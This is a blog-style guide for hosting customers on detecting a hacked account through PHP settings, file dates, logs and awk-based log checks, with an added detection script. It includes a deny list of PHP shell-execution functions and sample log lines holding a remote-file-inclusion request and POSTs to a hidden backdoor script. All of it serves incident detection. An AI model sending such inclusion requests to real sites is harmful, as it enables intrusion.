HOW TO: Know if You’ve Been Hacked

I frequently clean cracked WestHost accounts, but sometimes they have not actually been cracked, or the compromise is a little hard to track down.
Here is a guide to what to look for if you think an account might be compromised. Some of this information is specific to WestHost accounts purchased before Nov. 2009, but I’ve included enough general material that it translates to other systems, platforms and hosts.

  1. Location, Location, Location
    Where is the malicious content initially found? 9 times out of 10 it’ll be in a sub-directory of a specific PHP application, and that application is usually the one that was exploited.

  2. PHP Variables
    Below are commonly exploited functions and settings within PHP. Ensure the three settings below are disabled if at all possible [or enable them only for the directory that needs them].
    Quick check of /etc/php.ini variables:
    disable_functions = passthru,proc_open,shell_exec,system ; ensure these are in the list
    register_globals = Off
    allow_url_fopen = Off
    allow_url_include = Off
    While shared accounts in the cPanel system do not have access to the server-level php.ini file, you can use local PHP configuration files. Here’s a great link to a forum post with information on how to do so:

  3. Modification Dates
    What are the modification times on the files? This is very important, as it tells you how old the hack is. If you know when it was put there, you can examine the log files for anything suspicious at that time.

  4. Got POST?
    Look for the pages that have been POSTed to most often in the Apache logs. If there is a backdoor shell, it will typically show up in that list.

  5. Check for Strange Files in /tmp
    This is a common location for crackers to stick scripts.

  6. Check Your Process List for Anything Suspicious
    If you see something, either install lsof and look at where it’s executing from, or contact us to check for you.
    Shared cPanel users will likely just want to contact Technical Support.

  7. Know Your Log Files
    Do you know how to enable FTP logs? Where they are kept? bash_history? access_logs? error_logs? Check them all.
    cPanel provides access to the Apache log, but you can also tail system logs via SSH.

  8. Run Some Command Line Checks
    Run the command below and look for any strange GET requests. It prints the request line of every log entry and keeps only those carrying a query string (the ones with a ? in them).
    awk -F '"' '{print $2}' /var/log/httpd/access_log | grep -F '?' | less
    Example: GET /domain.html/default/theme.php?THEME_DIR= HTTP/1.1
    GET /default/theme.php?THEME_DIR=
    This command will work from the shared cPanel accounts.
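As an added example (not part of the original post), the shell script below turns the "Got POST?" step and the strange-GET check above into two reusable functions and runs them over a few constructed log lines in Apache combined format; the addresses, paths and user agents in the sample are made up.

```shell
#!/bin/sh
# Added example (not from the original post): two checks over an Apache
# combined-format access log. Sample lines below are constructed, not real.

# Constructed sample log (Apache combined format).
SAMPLE_LOG=$(cat <<'EOF'
203.0.113.5 - - [10/Mar/2010:10:00:01 -0700] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2010:10:00:02 -0700] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Mar/2010:10:00:03 -0700] "GET /default/theme.php?THEME_DIR=http://example.net/x.txt? HTTP/1.1" 200 812 "-" "libwww-perl/5.8"
198.51.100.9 - - [10/Mar/2010:10:00:04 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 311 "-" "libwww-perl/5.8"
198.51.100.9 - - [10/Mar/2010:10:00:05 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 422 "-" "libwww-perl/5.8"
198.51.100.9 - - [10/Mar/2010:10:00:06 -0700] "POST /images/.cache/x.php HTTP/1.1" 200 97 "-" "libwww-perl/5.8"
EOF
)

# "Got POST?": count POST requests per path (query string stripped), busiest
# first. Reads a combined-format log on stdin. Field 2 of a line split on
# double quotes is the request line, e.g. POST /wp-login.php HTTP/1.1.
top_post_targets() {
  awk -F '"' '$2 ~ /^POST / {
      split($2, r, " "); sub(/\?.*/, "", r[2]); n[r[2]]++
    }
    END { for (p in n) print n[p], p }' | sort -rn
}

# Strange GETs: request lines whose query string passes a URL as a parameter
# value, the remote-include pattern the THEME_DIR= example above illustrates.
remote_url_param_requests() {
  awk -F '"' '$2 ~ /\?/ && $2 ~ /=(https?|ftp):\/\// { print $2 }'
}

# Run both checks over the constructed sample; on a real server, replace the
# printf with: cat /var/log/httpd/access_log | top_post_targets
printf '%s\n' "$SAMPLE_LOG" | top_post_targets
printf '%s\n' "$SAMPLE_LOG" | remote_url_param_requests
```

A script under an image or cache directory that collects more POSTs than the site's real forms is the kind of hit step 4 describes.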

  9. Document
    Always document everything you’ve seen, everything you find and everything you do. If you have backups to restore your site from, make sure you save a copy of the hacked files, remove their permissions, and let Tech Support run a final check of the files in question.

  10. Google’s Your Friend
    Chances are that if you’ve been hacked, it’s happened a million times over to others running the same application. Typically there are posts about possible entry points, etc.

  11. Repetition, Repetition, Repetition
    Hackers like to repeat things. Why? Because they use scripts to do their work for them. So if you find one instance, check for others in other files.

I realize some of this may seem quite technical, so please comment with your questions.
This list could be expanded, but these steps are good places to start if you are worried about your account’s security. Have any other tricks you’d like to impart?